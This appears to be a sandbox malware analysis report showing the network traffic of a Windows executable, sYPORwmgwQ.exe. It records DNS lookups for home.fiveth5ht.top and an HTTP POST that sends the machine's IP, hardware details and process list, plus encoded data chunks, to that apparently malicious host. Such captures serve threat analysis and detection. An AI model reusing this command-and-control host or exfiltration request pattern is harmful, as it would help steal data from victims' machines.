Dec 28, 2024 09:34:52.962363958 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.962394953 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.962527037 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.962567091 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.962691069 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.962733030 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.962773085 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.962810040 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.962929964 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.962968111 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:52.962970972 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:52.963006973 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.006962061 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.007092953 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.079958916 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.080056906 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.080137968 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.080193996 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.080219030 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.080337048 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.080467939 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.080581903 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.080723047 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.080815077 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.080878019 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.080925941 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.080980062 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.081077099 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.081113100 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.081199884 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.081208944 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.081346989 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.081356049 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.081372023 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.081715107 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.081979036 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.081988096 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082034111 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.082113028 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082124949 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082166910 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.082252979 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082262993 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082312107 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.082330942 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082340956 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082386017 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.082428932 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082442999 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082480907 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.082561016 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082570076 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082614899 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082624912 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082775116 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082783937 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082921028 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082945108 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.082962036 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083014011 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083056927 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083080053 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083211899 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083221912 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083276987 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083319902 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083399057 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083408117 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083476067 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083483934 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083534002 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083585024 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083607912 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083709002 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083717108 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083749056 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083821058 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083830118 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083888054 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083897114 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083976984 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.083986044 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.084084034 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.084094048 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.084120035 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.084156990 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.084203005 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.126658916 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.144731045 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.144855022 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.144926071 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.145306110 CET	49705	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.199661016 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.199671984 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.199768066 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.199776888 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.199826956 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.199835062 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201258898 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201267958 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201318979 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201328039 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201370001 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201421022 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201469898 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201478958 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201553106 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201570034 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201622963 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201641083 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201764107 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201772928 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201813936 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201832056 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201920033 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201929092 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201986074 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.201994896 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202085972 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202094078 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202168941 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202178955 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202224016 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202236891 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202292919 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202301025 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202399015 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202408075 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202452898 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202503920 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202512980 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202553988 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202627897 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202636957 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202701092 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202711105 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202811003 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202820063 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202908993 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202917099 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.202997923 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.203006983 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.203074932 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.203083992 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.203167915 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.203176022 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.203222036 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.203260899 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.203300953 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.203305006 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.203457117 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.203478098 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.264322042 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.264672995 CET	80	49705	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.861918926 CET	49706	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.981581926 CET	80	49706	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:53.986834049 CET	49706	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:53.987222910 CET	49706	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:54.106669903 CET	80	49706	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:55.297974110 CET	80	49706	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:55.298105955 CET	80	49706	81.29.149.125	192.168.2.5
Dec 28, 2024 09:34:55.298155069 CET	49706	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:55.298430920 CET	49706	80	192.168.2.5	81.29.149.125
Dec 28, 2024 09:34:55.417989969 CET	80	49706	81.29.149.125	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:34:46.877777100 CET	62851	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:34:46.877881050 CET	62851	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:34:47.018276930 CET	53	62851	1.1.1.1	192.168.2.5
Dec 28, 2024 09:34:47.018296957 CET	53	62851	1.1.1.1	192.168.2.5
Dec 28, 2024 09:34:51.523416042 CET	62854	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:34:51.523492098 CET	62854	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:34:51.663516998 CET	53	62854	1.1.1.1	192.168.2.5
Dec 28, 2024 09:34:51.663743019 CET	53	62854	1.1.1.1	192.168.2.5
Dec 28, 2024 09:34:53.721112013 CET	62856	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:34:53.721204042 CET	62856	53	192.168.2.5	1.1.1.1
Dec 28, 2024 09:34:53.860378981 CET	53	62856	1.1.1.1	192.168.2.5
Dec 28, 2024 09:34:53.860877037 CET	53	62856	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 09:34:46.877777100 CET	192.168.2.5	1.1.1.1	0x41f1	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:46.877881050 CET	192.168.2.5	1.1.1.1	0x7bc8	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 28, 2024 09:34:51.523416042 CET	192.168.2.5	1.1.1.1	0x2fbe	Standard query (0)	home.fiveth5ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:51.523492098 CET	192.168.2.5	1.1.1.1	0xcd0e	Standard query (0)	home.fiveth5ht.top	28	IN (0x0001)	false
Dec 28, 2024 09:34:53.721112013 CET	192.168.2.5	1.1.1.1	0xacb4	Standard query (0)	home.fiveth5ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:53.721204042 CET	192.168.2.5	1.1.1.1	0xbb1d	Standard query (0)	home.fiveth5ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 09:34:47.018276930 CET	1.1.1.1	192.168.2.5	0x41f1	No error (0)	httpbin.org	34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:47.018276930 CET	1.1.1.1	192.168.2.5	0x41f1	No error (0)	httpbin.org	3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:51.663743019 CET	1.1.1.1	192.168.2.5	0x2fbe	No error (0)	home.fiveth5ht.top	81.29.149.125	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:34:53.860877037 CET	1.1.1.1	192.168.2.5	0xacb4	No error (0)	home.fiveth5ht.top	81.29.149.125	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:35:00.813930035 CET	1.1.1.1	192.168.2.5	0x8e8d	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:35:00.813930035 CET	1.1.1.1	192.168.2.5	0x8e8d	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.fiveth5ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	81.29.149.125	80	4028	C:\Users\user\Desktop\sYPORwmgwQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:34:51.785990953 CET	12360	OUT	POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: / Content-Type: application/json Content-Length: 444129 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 35 35 30 31 32 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8428488241957550120", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe" [TRUNCATED]
Dec 28, 2024 09:34:51.905836105 CET	4944	OUT	Data Raw: 2f 64 50 34 66 7a 46 64 42 79 6b 4e 46 53 37 54 5c 2f 65 50 2b 66 78 70 39 41 45 57 77 2b 33 2b 66 77 6f 32 48 32 5c 2f 7a 2b 46 66 72 48 70 76 38 41 77 53 6c 2b 49 65 71 61 66 6f 32 70 57 76 78 42 74 62 6d 31 31 76 54 4e 4d 31 4f 32 6d 73 76 42 Data Ascii: /dP4fzFdBykNFS7T\/eP+fxp9AEWw+3+fwo2H2\/z+FfrHpv8AwSl+Ieqafo2pWvxBtbm11vTNM1O2msvBt9dwRJqdpFdRQ3Eq66gt5U80QMZ1hV5VxEXVkLasn\/BJP4g2uDqHxEbT1IzvufhzrMcWB1KyvrixttBBbDfKCM4yuf45xH0\/fomYX6w6\/ilio08LiK+Er4iPhz4q1cLDEYabp1qaxdLgeeFnyTVnKnVlBpqUZO
Dec 28, 2024 09:34:51.905865908 CET	9888	OUT	Data Raw: 37 50 7a 5c 2f 44 5c 2f 67 6d 6c 50 72 38 76 31 47 66 50 48 47 6b 61 50 47 50 33 74 7a 2b 38 5c 2f 77 43 65 33 34 2b 76 72 39 4d 55 5a 5c 2f 6a 52 35 49 58 6c 5c 2f 65 2b 5a 5c 2f 71 49 42 6e 2b 66 66 69 6e 74 4a 38 7a 4a 39 2b 4f 50 39 31 5c 2f Data Ascii: 7Pz\/D\/gmlPr8v1GfPHGkaPGP3tz+8\/wCe34+vr9MUZ\/jR5IXl\/e+Z\/qIBn+ffintJ8zJ9+OP91\/quO\/8ApWfSnyRuuzYn8\/tH17e3\/wBc1maH7kP94\/h\/IU2nv1\/D+pplcXI\/L+vkf5Pn66fsQeI7uf4L6joy3DNaaf4v1fT7vTJ9tzp97bTWul6tGt\/plyZ7G9tnm1C5UQ3Vs8DskuYmO9399174W\/DTxL
Dec 28, 2024 09:34:51.905899048 CET	2472	OUT	Data Raw: 76 41 4d 46 73 4c 7a 55 74 51 6d 74 72 4f 32 2b 30 54 58 31 6e 42 44 35 73 36 69 61 65 35 68 74 30 33 53 79 72 47 66 67 33 39 6f 44 78 64 34 57 38 61 2b 47 50 32 2b 4e 55 38 49 65 49 39 45 38 55 36 5a 70 76 37 47 33 77 59 30 43 5c 2f 31 4c 77 39 Data Ascii: vAMFsLzUtQmtrO2+0TX1nBD5s6iae5ht03SyrGfg39oDxd4W8a+GP2+NU8IeI9E8U6Zpv7G3wY0C\/1Lw9qlnrOn2uuQav+09rs+kzX2nzXFquoQaN4i0HU5rXzTNFZaxp1xIix3cJf+x+DY0aXiF4b0vcjiP8AXjJZOL5ViJYaNbMPYzktKkqN6k3Tk1yc1STi7zd8M2wGKwXgN42YXC08dLh\/K\/B7N8vwU5fWKuX0MXTzTg
Dec 28, 2024 09:34:51.905926943 CET	2472	OUT	Data Raw: 49 75 50 77 5c 2f 6b 66 38 5c 2f 77 41 36 68 71 78 55 4c 5c 2f 65 50 34 66 79 46 42 72 7a 76 79 5c 2f 72 35 6c 64 6c 32 34 37 35 70 74 57 4b 69 66 72 2b 48 39 54 51 61 6a 4b 67 6b 6a 2b 58 72 6e 38 50 38 39 65 6c 54 30 55 48 51 55 70 49 5c 2f 6c Data Ascii: IuPw\/kf8\/wA6hqxUL\/eP4fyFBrzvy\/r5ldl2475ptWKifr+H9TQajKgkj+Xrn8P89elT0UHQUpI\/l44+vf8Az0+n6sqZ\/un8P5ioaDoIeWP+eKZ\/Gn1NSydvx\/pUdB2U+vyIfmb1P8v8M1G0ae4Tp\/nP+elWqjk7fj\/SgcNvn+iKckX9wevb+g\/x9earSK6Mf4\/1\/wAn0PX1q\/J\/ufz\/AP1+voBTP4fuR\/
Dec 28, 2024 09:34:51.905985117 CET	4944	OUT	Data Raw: 4e 76 38 41 4d 54 7a 50 2b 32 47 50 38 5c 2f 38 41 31 38 69 6e 78 5c 2f 76 50 56 48 5c 2f 35 5a 52 79 52 59 5c 2f 7a 2b 50 76 51 42 54 6b 5c 2f 76 4a 39 66 4b 5c 2f 4d 34 5c 2f 6c 30 5c 2f 4c 76 55 6e 6d 49 4a 50 39 54 35 4d 30 5c 2f 77 43 39 7a Data Ascii: Nv8AMTzP+2GP8\/8A18inx\/vPVH\/5ZRyRY\/z+PvQBTk\/vJ9fK\/M4\/l0\/LvUnmIJP9T5M0\/wC9z\/ruOv8AomM\/549Kdu2yJsmjdPz\/AMc\/0xUKyGPzmdJP3n\/Pv\/z7jv8A\/q7Vp7Ty\/H\/gANkx5e\/fI7+b\/q5Jf3HTn\/649f1Q+X5n9\/8A7Zf6nj\/P5mnr\/uSe\/mfuP88H25o+WRpndN7+b+6\/z
Dec 28, 2024 09:34:52.025422096 CET	2472	OUT	Data Raw: 38 48 4c 66 78 66 38 51 5c 2f 68 6a 38 61 50 6a 44 34 42 2b 44 46 5c 2f 72 50 78 4e 74 66 69 70 34 78 38 41 5c 2f 41 44 55 66 48 39 6a 38 54 64 55 30 61 61 4c 34 52 58 50 77 6a 53 2b 30 6d 32 2b 46 5c 2f 6a 62 57 4c 4c 51 64 55 2b 4c 4f 6d 36 33 Data Ascii: 8HLfxf8Q\/hj8aPjD4B+DF\/rPxNtfip4x8A\/ADUfH9j8TdU0aaL4RXPwjS+0m2+F\/jbWLLQdU+LOm63rGmaNKNOsJ9SntdOn5OHVPCCeAtM8aeIvi58Gvh5q\/ib4c6r8WfA3ww+IXiD4gab8RvG3gCz0i\/1fRPENhH4X+FvjHwJ4Tg8fJpd9B8OrT4o+PPh\/qXjJf7M1fSLGXw34j8M63rP4fPwV+iTTr47Cy4jzF4vLs
Dec 28, 2024 09:34:52.025460958 CET	2472	OUT	Data Raw: 50 38 41 77 44 57 47 33 7a 5c 2f 52 45 4c 62 39 33 79 66 4a 5c 2f 77 42 63 2b 33 2b 48 70 54 35 4a 50 33 65 78 45 5c 2f 31 66 5c 2f 4c 54 5c 2f 41 44 39 50 36 64 42 7a 49 64 5c 2f 6d 62 4f 58 2b 7a 5c 2f 33 5c 2f 41 4d 50 78 71 72 75 32 5c 2f 77 Data Ascii: P8AwDWG3z\/RELb93yfJ\/wBc+3+HpT5JP3exE\/1f\/LT\/AD9P6dBzId\/mbOX+z\/3\/AMPxqru2\/wAfzjjr\/wCTX+fX8K0LHln5T\/v1JJ\/n\/P61D8\/l7z8n5df+nT+VP\/1gHyfuv+WXf\/PB\/PNQrn7h\/wBJT\/rr+\/h\/Dn+Vc51878v6+Yyb7vyR\/P8A6qX\/AKbf569PT8YWVPMcp88f+q8z\/lv\/AJ6
Dec 28, 2024 09:34:52.025482893 CET	2472	OUT	Data Raw: 5c 2f 77 55 73 2b 48 6e 37 52 66 67 72 77 5c 2f 77 44 44 58 34 46 4a 34 44 67 5c 2f 62 63 5c 2f 5a 74 31 62 78 48 62 61 42 34 77 30 4c 34 79 65 44 66 44 48 67 62 77 50 6f 33 78 41 2b 4e 6e 77 64 38 50 36 66 66 65 4a 76 68 72 34 35 5c 2f 61 50 74 Data Ascii: \/wUs+Hn7Rfgrw\/wDDX4FJ4Dg\/bc\/Zt1bxHbaB4w0L4yeDfDHgbwPo3xA+Nnwd8P6ffeJvhr45\/aPtrfxJ4r8G\/EL4v+AfE3xAjvNT0DTdT+nZI0lRo5USSNxh0kUOjD0ZWBVh7EEVmPoOhyRCCTRdJkhByIX06zaIHJORG0JTOSTnGcknvX8+eMPgLl3i5nnC2fYzPcdlOL4SwuMo5bTw1OnUoTr4rOMgzn6zXUrVVOnU
Dec 28, 2024 09:34:52.025538921 CET	2472	OUT	Data Raw: 77 62 70 5c 2f 77 43 77 78 71 5c 2f 37 48 75 75 5c 2f 74 4f 54 66 46 6d 61 37 2b 44 55 76 78 4a 38 5a 52 33 48 37 53 48 69 44 34 38 7a 5c 2f 41 4c 4c 6b 48 37 48 7a 5c 2f 47 66 55 62 37 52 5c 2f 32 7a 74 53 47 6f 78 33 4d 58 78 31 66 56 72 5c 2f Data Ascii: wbp\/wCwxq\/7Huu\/tOTfFma7+DUvxJ8ZR3H7SHiD48z\/ALLkH7Hz\/GfUb7R\/2ztSGox3MXx1fVr\/AMK6JZ3x0i807d4Yu\/rI2OntObptPs2uWBDXBtoDOQeoMxj8wg9wWwad9g08wPCbGz+zyENJB9lh8mRgCoLx+XsYgEqCynAJHQ1\/OXFP0POEuKs34kzzGZ7nGGzHiPOM3zqriMJ7KjPB4zMciXD+GqYKdKnTr0K
